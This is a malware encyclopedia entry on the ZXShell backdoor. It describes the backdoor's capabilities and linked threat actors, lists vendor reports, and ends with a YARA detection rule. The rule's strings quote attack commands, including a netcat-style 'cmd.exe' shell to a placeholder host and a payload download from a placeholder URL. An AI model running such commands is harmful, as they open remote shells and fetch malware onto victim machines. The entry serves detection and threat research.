win.zxshell

ZXShell

aka: Sensocode

Actor(s): APT41, EMISSARY PANDA, Leviathan


According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

References

2023-05-15 | Symantec (Threat Hunter Team) | Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors
  Tags: Merdoor, PlugX, ShadowPad, ZXShell, Lancefly

2022-07-18 | Palo Alto Networks Unit 42 (Unit 42) | Iron Taurus
  Tags: CHINACHOPPER, Ghost RAT, Wonknu, ZXShell, APT27

2022-05-09 | Qianxin Threat Intelligence Center (Red Raindrops Team) | Operation EviLoong: An electronic party of "borderless" hackers
  Tags: ZXShell

2020-07-20 | Risky.biz (Daniel Gordon) | What even is Winnti?
  Tags: CCleaner Backdoor, Ghost RAT, PlugX, ZXShell

2020-04-07 | Blackberry (Blackberry Research) | Decade of the RATS: Cross-Platform APT Espionage Attacks Targeting Linux, Windows and Android
  Tags: Penquin Turla, XOR DDoS, ZXShell

2020-01-13 | Lab52 (Jagaimo Kawaii) | APT27 ZxShell RootKit module updates
  Tags: ZXShell

2020-01-01 | Secureworks (SecureWorks) | BRONZE KEYSTONE
  Tags: 9002 RAT, BLACKCOFFEE, DeputyDog, Derusbi, HiKit, PlugX, Poison Ivy, ZXShell, APT17

2020-01-01 | Secureworks (SecureWorks) | BRONZE UNION
  Tags: 9002 RAT, CHINACHOPPER, Enfal, Ghost RAT, HttpBrowser, HyperBro, owaauth, PlugX, Poison Ivy, ZXShell, APT27

2019-11-19 | FireEye (Kelli Vanderlee, Nalani Fraser) | Achievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions
  Tags: MESSAGETAP, TSCookie, ACEHASH, CHINACHOPPER, Cobalt Strike, Derusbi, Empire Downloader, Ghost RAT, HIGHNOON, HTran, MimiKatz, NetWire RC, poisonplug, Poison Ivy, pupy, Quasar RAT, ZXShell

2019-09-23 | MITRE (MITRE ATT&CK) | APT41
  Tags: Derusbi, MESSAGETAP, Winnti, ASPXSpy, BLACKCOFFEE, CHINACHOPPER, Cobalt Strike, Empire Downloader, Ghost RAT, MimiKatz, NjRAT, PlugX, ShadowPad, ZXShell, APT41

2019-09-19 | MeltX0R | Emissary Panda APT: Recent infrastructure and RAT analysis
  Tags: ZXShell

2019-02-27 | Secureworks (CTU Research Team) | A Peek into BRONZE UNION's Toolbox
  Tags: Ghost RAT, HyperBro, ZXShell

2019-01-01 | Virus Bulletin (Bowen Pan, Lion Gu) | A vine climbing over the Great Firewall: A long-term attack against China
  Tags: Poison Ivy, ZXShell

2017-05-31 | MITRE (MITRE ATT&CK) | Axiom
  Tags: Derusbi, 9002 RAT, BLACKCOFFEE, Ghost RAT, HiKit, PlugX, ZXShell, APT17

2016-10-28 | Github (smb01) | zxshell repository
  Tags: ZXShell

2014-10-28 | Cisco (Alain Zidouemba, Andrea Allievi, Douglas Goddard, Shaun Hurley) | Threat Spotlight: Group 72, Opening the ZxShell
  Tags: ZXShell
Yara Rules
[TLP:WHITE] win_zxshell_w0 (20180301 | No description)
rule win_zxshell_w0 {
    meta:
        author = "Florian Roth"
        reference = "https://blogs.rsa.com/cat-phishing/"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell"
        malpedia_version = "20180301"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $x1 = "zxplug -add" fullword ascii
        $x2 = "getxxx c:\\xyz.dll" fullword ascii
        $x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
        $x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
        $x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
        $x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
        $x7 = "(bind a cmdshell)" fullword ascii
        $x8 = "ZXFtpServer 21 20 zx" fullword ascii
        $x9 = "ZXHttpServer" fullword ascii
        $x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
        $x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
        $x12 = "AntiSniff -a wireshark.exe" fullword ascii
        $x13 = "c:\\windows\\keylog.txt" fullword ascii
    condition:
        3 of them
}